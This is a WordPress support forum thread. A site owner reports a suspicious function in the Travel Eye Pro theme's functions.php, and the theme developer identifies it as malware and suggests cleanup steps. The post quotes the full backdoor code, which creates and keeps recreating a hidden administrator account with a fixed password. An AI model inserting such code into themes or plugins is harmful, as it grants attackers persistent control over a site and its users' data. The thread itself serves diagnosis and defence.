- This topic has 1 reply, 2 voices, and was last updated 4 years, 8 months ago by
.
-
Posts
-
Hello,
There is an unauthorized user being created in the travel eye pro functions.php file.
Below is the code:
function wpb_admin_account(){
$user = ‘UsernamE’;
$pass = ‘UsernamE’;
$email = ’email@domain.com’;
//if a username with the email ID does not exist, create a new user account
if ( !username_exists( $user ) && !email_exists( $email ) ) {
$user_id = wp_create_user( $user, $pass, $email );
$user = new WP_User( $user_id );
//Set the new user as a Admin
$user->set_role( ‘administrator’ );
} }What is happening here is that this function creates a user with the Username of UsernamE and same password and the email is email@domain.com. Now every time you delete this, this file will create this user again and give admin role to the user.
Can you please check if this code is a part of Travel Eye theme functions.php file or if you know the purpose of this code?Thank you!
Hello @lynaeash,
The code is not in our core file. It must be a malware infection as you have mentioned.
Malware infection could be injected in four ways
1 – using fake WordPress admin user credentials
2 – via a vulnerable plugin(s) installed on your system
3 – via previously installed malicious shell used to reinfect other
4 – In the case of shared hosting or multiple sites on the same hosting account, the infection may come from other sites as wellIt is worth to
1 – reset all WordPress password and review/remove all suspicious uses
2 – investigate your WordPress setup with other security plugins
3 – investigate website access log to locate what exactly exploited on your sideSo please verify these steps.
Thank you.
- You must be logged in to reply to this topic.
